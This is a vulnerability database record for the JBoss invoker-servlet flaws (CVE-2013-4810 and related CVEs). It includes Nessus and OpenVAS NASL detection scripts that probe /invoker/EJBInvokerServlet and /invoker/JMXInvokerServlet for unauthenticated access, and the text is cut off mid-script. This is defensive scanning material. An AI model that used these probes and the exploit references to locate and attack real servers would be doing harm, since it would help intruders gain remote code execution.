Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities

2013-10-14T00:00:00

Description

The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on the web server on the remote host are accessible to unauthenticated users. The remote host is, therefore, affected by the following vulnerabilities : - A security bypass vulnerability exists due to improper restriction of access to the console and web management interfaces. An unauthenticated, remote attacker can exploit this, via direct requests, to bypass authentication and gain administrative access. (CVE-2007-1036) - A remote code execution vulnerability exists due to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets not properly restricting access to profiles. An unauthenticated, remote attacker can exploit this to bypass authentication and invoke MBean methods, resulting in the execution of arbitrary code. (CVE-2012-0874) - A remote code execution vulnerability exists in the EJBInvokerServlet and JMXInvokerServlet servlets due to the ability to post a marshalled object. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to install arbitrary applications. Note that this issue is known to affect McAfee Web Reporter versions prior to or equal to version 5.2.1 as well as Symantec Workspace Streaming version 7.5.0.493 and possibly earlier. (CVE-2013-4810)

{"id": "JMXINVOKERSERVLET_EJBINVOKERSERVLET_RCE.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities", "description": "The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on the web server on the remote host are accessible to unauthenticated users. The remote host is, therefore, affected by the following vulnerabilities :\n\n - A security bypass vulnerability exists due to improper restriction of access to the console and web management interfaces. An unauthenticated, remote attacker can exploit this, via direct requests, to bypass authentication and gain administrative access.\n (CVE-2007-1036)\n\n - A remote code execution vulnerability exists due to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets not properly restricting access to profiles. An unauthenticated, remote attacker can exploit this to bypass authentication and invoke MBean methods, resulting in the execution of arbitrary code.\n (CVE-2012-0874)\n\n - A remote code execution vulnerability exists in the EJBInvokerServlet and JMXInvokerServlet servlets due to the ability to post a marshalled object. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to install arbitrary applications. Note that this issue is known to affect McAfee Web Reporter versions prior to or equal to version 5.2.1 as well as Symantec Workspace Streaming version 7.5.0.493 and possibly earlier.\n (CVE-2013-4810)", "published": "2013-10-14T00:00:00", "modified": "2022-03-28T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/70414", "reporter": "This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0874", "http://www.nessus.org/u?52567bc1", "https://seclists.org/bugtraq/2013/Oct/126", "http://www.nessus.org/u?74979c27", "https://www.securityfocus.com/archive/1/530241/30/0/threaded", "https://seclists.org/bugtraq/2013/Dec/att-133/ESA-2013-094.txt", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1036", "https://www.zerodayinitiative.com/advisories/ZDI-13-229/"], "cvelist": ["CVE-2007-1036", "CVE-2012-0874", "CVE-2013-4810"], "immutableFields": [], "lastseen": "2022-06-16T14:16:23", "viewCount": 3351, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:042526B3-4F4D-49D3-A3D1-B483FB66CF4C"]}, {"type": "cert", "idList": ["VU:632656"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0078"]}, {"type": "cve", "idList": ["CVE-2007-1036", "CVE-2012-0874", "CVE-2013-4810"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "nessus", "idList": ["CISCO_PRIME_DCNM_6_1_2.NASL", "CISCO_PRIME_DCNM_6_1_2_LOCAL.NASL", "JBOSS_JAVA_SERIALIZE.NASL", "REDHAT-RHSA-2013-0191.NASL", "REDHAT-RHSA-2013-0192.NASL", "REDHAT-RHSA-2013-0193.NASL", "REDHAT-RHSA-2013-0195.NASL", "REDHAT-RHSA-2013-0196.NASL", "REDHAT-RHSA-2013-0197.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103811", "OPENVAS:1361412562310142595"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:116241"]}, {"type": "redhat", "idList": ["RHSA-2013:0191", "RHSA-2013:0192", "RHSA-2013:0194", "RHSA-2013:0195", "RHSA-2013:0196", "RHSA-2013:0198", "RHSA-2013:0221", "RHSA-2013:0533"]}, {"type": "saint", "idList": ["SAINT:73B78E4CC6A84900DDFE755805A5092F", "SAINT:88A58EBA93902ACCCFD4D15339D739F8", "SAINT:C4CE6EE786263B63DE8534C3A7C9A1ED", "SAINT:F331FA17751309C5BD461AF4E8A90312"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29808", "SECURITYVULNS:DOC:30174", "SECURITYVULNS:DOC:30182", "SECURITYVULNS:VULN:13282", "SECURITYVULNS:VULN:13495", "SECURITYVULNS:VULN:13501", "SECURITYVULNS:VULN:7280"]}, {"type": "seebug", "idList": ["SSV:60624"]}, {"type": "thn", "idList": ["THN:8573602ED2B18F90AC04D8BA8D25E682"]}, {"type": "threatpost", "idList": ["THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "THREATPOST:7E20261F9330304969941B4755E98BAA"]}, {"type": "zdi", "idList": ["ZDI-13-229"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cert", "idList": ["VU:632656"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0078"]}, {"type": "cve", "idList": ["CVE-2007-1036"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/JBOSS_INVOKE_DEPLOY"]}, {"type": "nessus", "idList": ["JBOSS_JAVA_SERIALIZE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142595"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:116241"]}, {"type": "redhat", "idList": ["RHSA-2013:0196"]}, {"type": "saint", "idList": ["SAINT:88A58EBA93902ACCCFD4D15339D739F8"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13495"]}, {"type": "seebug", "idList": ["SSV:60624"]}, {"type": "threatpost", "idList": ["THREATPOST:7E20261F9330304969941B4755E98BAA"]}, {"type": "zdi", "idList": ["ZDI-13-229"]}]}, "exploitation": null, "vulnersScore": 0.5}, "_state": {"dependencies": 1659965596, "score": 1659817288}, "_internal": {"score_hash": "3fe0e744e30d49b7ecf93c2205d269de"}, "pluginID": "70414", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70414);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\"CVE-2007-1036\", \"CVE-2012-0874\", \"CVE-2013-4810\");\n script_bugtraq_id(57552, 62854, 77037);\n script_xref(name:\"CERT\", value:\"632656\");\n script_xref(name:\"EDB-ID\", value:\"16318\");\n script_xref(name:\"EDB-ID\", value:\"21080\");\n script_xref(name:\"EDB-ID\", value:\"28713\");\n script_xref(name:\"EDB-ID\", value:\"30211\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-229\");\n script_xref(name:\"HP\", value:\"HPSBGN02952\");\n script_xref(name:\"HP\", value:\"SSRT101127\");\n script_xref(name:\"HP\", value:\"emr_na-c04041110\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on\nthe web server on the remote host are accessible to unauthenticated\nusers. The remote host is, therefore, affected by the following\nvulnerabilities :\n\n - A security bypass vulnerability exists due to improper\n restriction of access to the console and web management\n interfaces. An unauthenticated, remote attacker can\n exploit this, via direct requests, to bypass\n authentication and gain administrative access.\n (CVE-2007-1036)\n\n - A remote code execution vulnerability exists due to the\n JMXInvokerHAServlet and EJBInvokerHAServlet invoker\n servlets not properly restricting access to profiles. An\n unauthenticated, remote attacker can exploit this to\n bypass authentication and invoke MBean methods,\n resulting in the execution of arbitrary code.\n (CVE-2012-0874)\n\n - A remote code execution vulnerability exists in the\n EJBInvokerServlet and JMXInvokerServlet servlets due to\n the ability to post a marshalled object. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted request, to install arbitrary\n applications. Note that this issue is known to affect\n McAfee Web Reporter versions prior to or equal to\n version 5.2.1 as well as Symantec Workspace Streaming\n version 7.5.0.493 and possibly earlier.\n (CVE-2013-4810)\");\n # https://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74979c27\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-229/\");\n # https://web.archive.org/web/20131031213751/http://retrogod.altervista.org/9sg_ejb.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?52567bc1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Oct/126\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/530241/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Dec/att-133/ESA-2013-094.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using EMC Data Protection Advisor, either upgrade to version 6.x or\napply the workaround for 5.x. \n\nOtherwise, contact the vendor or remove any affected JBoss servlets.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4810\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'JBoss JMX Console Deployer Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-13-606\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:procurve_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:application_lifecycle_management\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:identity_driven_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_web_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_application_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_brms_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_application_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:jboss:jboss_application_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:workspace_streaming\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 9111, 8080, 9832);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Identify possible ports.\n#\n# - web servers.\nports = get_kb_list(\"Services/www\");\nif (isnull(ports)) ports = make_list();\n\n# - ports for McAfee Web Reporter and Symantec Workspace Streaming.\nforeach p (make_list(8080, 9111, 9832))\n{\n if (service_is_unknown(port:p)) ports = add_port_in_list(list:ports, port:p);\n}\n\n# Check each port.\nnon_vuln = make_list();\n\nforeach port (ports)\n{\n vuln_urls = make_list();\n\n foreach page (make_list(\"/EJBInvokerServlet\", \"/JMXInvokerServlet\"))\n {\n url = \"/invoker\" + page;\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n fetch404 : TRUE\n );\n\n if (\n !isnull(res) &&\n \"org.jboss.invocation.MarshalledValue\" >< res[2] &&\n (\n 'WWW-Authenticate: Basic realm=\"JBoss HTTP Invoker\"' >!< res[1] ||\n \"404 Not Found\" >!< res[1]\n )\n ) vuln_urls = make_list(vuln_urls, build_url(qs:url, port:port));\n }\n\n if (max_index(vuln_urls) > 0)\n {\n if (max_index(vuln_urls) > 1) request = \"URLs\";\n else request = \"URL\";\n\n if (report_verbosity > 0)\n {\n report =\n '\\n' +'Nessus was able to verify the issue exists using the following '+\n '\\n' + request + ' :' +\n '\\n' +\n '\\n' + join(vuln_urls, sep:'\\n') + '\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n }\n else non_vuln = make_list(non_vuln, port);\n}\n\nif (max_index(non_vuln) == 1) exit(0, \"The web server tested on port \" + port + \" is not affected.\");\nelse if (max_index(non_vuln) > 1) exit(0, \"None of the ports tested (\" +join(non_vuln, sep:\", \")+ \") contain web servers that are affected.\");\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:hp:procurve_manager", "cpe:/a:hp:application_lifecycle_management", "cpe:/a:hp:identity_driven_manager", "cpe:/a:redhat:jboss_enterprise_web_platform", "cpe:/a:redhat:jboss_enterprise_application_platform", "cpe:/a:redhat:jboss_enterprise_brms_platform", "cpe:/a:redhat:jboss_enterprise_application_platform", "cpe:/a:jboss:jboss_application_server", "cpe:/a:symantec:workspace_streaming"], "solution": "If using EMC Data Protection Advisor, either upgrade to version 6.x or apply the workaround for 5.x. \n\nOtherwise, contact the vendor or remove any affected JBoss servlets.", "nessusSeverity": "Critical", "cvssScoreSource": "CVE-2013-4810", "vpr": {"risk factor": "High", "score": "7.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": null, "vulnerabilityPublicationDate": "2013-09-09T00:00:00", "exploitableWith": ["Core Impact", "Metasploit(JBoss JMX Console Deployer Upload and Execute)", "ExploitHub(EH-13-606)"]}

{"attackerkb": [{"lastseen": "2022-06-29T04:59:45", "description": "HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet, aka ZDI-CAN-1760. NOTE: this is probably a duplicate of CVE-2007-1036, CVE-2010-0738, and/or CVE-2012-0874.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2013-09-16T00:00:00", "type": "attackerkb", "title": "CVE-2013-4810", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036", "CVE-2010-0738", "CVE-2012-0874", "CVE-2013-4810"], "modified": "2020-06-05T00:00:00", "id": "AKB:042526B3-4F4D-49D3-A3D1-B483FB66CF4C", "href": "https://attackerkb.com/topics/ku1plIvfwG/cve-2013-4810", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:53:22", "description": "HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet, aka ZDI-CAN-1760. NOTE: this is probably a duplicate of CVE-2007-1036, CVE-2010-0738, and/or CVE-2012-0874.", "cvss3": {}, "published": "2013-09-16T13:01:00", "type": "cve", "title": "CVE-2013-4810", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036", "CVE-2010-0738", "CVE-2012-0874", "CVE-2013-4810"], "modified": "2017-10-05T01:29:00", "cpe": ["cpe:/a:hp:application_lifecycle_management:-", "cpe:/a:hp:identity_driven_manager:4.0", "cpe:/a:hp:procurve_manager:4.0", "cpe:/a:hp:procurve_manager:3.20"], "id": "CVE-2013-4810", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4810", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:identity_driven_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:application_lifecycle_management:-:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:49:48", "description": "The (1) JMXInvokerHAServlet and (2) EJBInvokerHAServlet invoker servlets in JBoss Enterprise Application Platform (EAP) before 5.2.0, Web Platform (EWP) before 5.2.0, BRMS Platform before 5.3.1, and SOA Platform before 5.3.1 do not require authentication by default in certain profiles, which might allow remote attackers to invoke MBean methods and execute arbitrary code via unspecified vectors. NOTE: this issue can only be exploited when the interceptor is not properly configured with a \"second layer of authentication,\" or when used in conjunction with other vulnerabilities that bypass this second layer.", "cvss3": {}, "published": "2013-02-05T23:55:00", "type": "cve", "title": "CVE-2012-0874", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0874"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:redhat:jboss_enterprise_application_platform:5.2.0", "cpe:/a:redhat:jboss_enterprise_brms_platform:5.3.0", "cpe:/a:redhat:jboss_enterprise_web_platform:5.2.0"], "id": "CVE-2012-0874", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0874", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:redhat:jboss_enterprise_web_platform:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:48:01", "description": "The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.", "cvss3": {}, "published": "2007-02-21T11:28:00", "type": "cve", "title": "CVE-2007-1036", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036"], "modified": "2018-10-16T16:36:00", "cpe": ["cpe:/a:jboss:jboss_application_server:*"], "id": "CVE-2007-1036", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1036", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jboss:jboss_application_server:*:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-08T11:04:12", "description": "Apache Tomcat/JBoss Application Server is prone to multiple remote code-\n execution vulnerabilities.", "cvss3": {}, "published": "2013-10-15T00:00:00", "type": "openvas", "title": "Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4810", "CVE-2012-0874"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310103811", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103811", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103811\");\n script_bugtraq_id(57552, 62854);\n script_version(\"2020-05-05T09:44:01+0000\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-0874\", \"CVE-2013-4810\");\n script_name(\"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-10-15 10:27:36 +0200 (Tue, 15 Oct 2013)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-229/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/57552\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/62854\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/28713/\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/30211\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting these issues may allow an attacker to execute\n arbitrary code within the context of the affected application. Failed\n exploit attempts may result in a denial-of-service condition.\");\n\n script_tag(name:\"vuldetect\", value:\"Determine if the EJBInvokerServlet and/or JMXInvokerServlet is accessible without authentication.\");\n\n script_tag(name:\"insight\", value:\"The specific flaw exists within the exposed EJBInvokerServlet and JMXInvokerServlet. An unauthenticated\n attacker can post a marshalled object allowing them to install an arbitrary application on the target server.\");\n\n script_tag(name:\"solution\", value:\"Ask the Vendor for an update and enable authentication for the mentioned servlets.\");\n\n script_tag(name:\"summary\", value:\"Apache Tomcat/JBoss Application Server is prone to multiple remote code-\n execution vulnerabilities.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat/JBoss Application Server providing access to the EJBInvokerServlet and/or JMXInvokerServlet\n without prior authentication.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:9200);\n\nreport = 'The following Servlets are accessible without authentication which indicates that a RCE attack can be executed:\\n';\n\nforeach file(make_list(\"/EJBInvokerServlet\", \"/JMXInvokerServlet\")) {\n\n url = \"/invoker\" + file;\n req = http_get(item:url, port:port);\n buf = http_send_recv(port:port, data:req);\n\n if(buf =~ \"^HTTP/1\\.[01] 200\" &&\n \"404\" >!< buf &&\n \"org.jboss.invocation.MarshalledValue\" >< buf &&\n \"x-java-serialized-object\" >< buf &&\n \"WWW-Authenticate\" >!< buf) {\n\n report += '\\n' + http_report_vuln_url(port:port, url:url, url_only:TRUE);\n VULN = TRUE;\n }\n}\n\nif(VULN) {\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T16:22:26", "description": "The default configuration of JBoss does not restrict access to the console and\n web management interfaces, which allows remote attackers to bypass authentication and gain administrative access\n via direct requests.", "cvss3": {}, "published": "2019-07-12T00:00:00", "type": "openvas", "title": "JBoss Console and Web Management Misconfiguration Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1036"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310142595", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142595", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = 'cpe:/a:redhat:jboss_application_server';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142595\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-07-12 06:01:03 +0000 (Fri, 12 Jul 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2007-1036\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_name(\"JBoss Console and Web Management Misconfiguration Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"JBoss_enterprise_aplication_server_detect.nasl\");\n script_mandatory_keys(\"jboss/detected\");\n\n script_tag(name:\"summary\", value:\"The default configuration of JBoss does not restrict access to the console and\n web management interfaces, which allows remote attackers to bypass authentication and gain administrative access\n via direct requests.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the jmx-console or web-console is accessible without authentication.\");\n\n script_tag(name:\"solution\", value:\"As stated by Red Hat, the JBoss AS console manager should always be secured\n prior to deployment, as directed in the JBoss Application Server Guide and release notes. By default, the JBoss\n AS installer gives users the ability to password protect the console manager. If the user did not use the\n installer, the raw JBoss services will be in a completely unconfigured state and these steps should be performed\n manually. See the 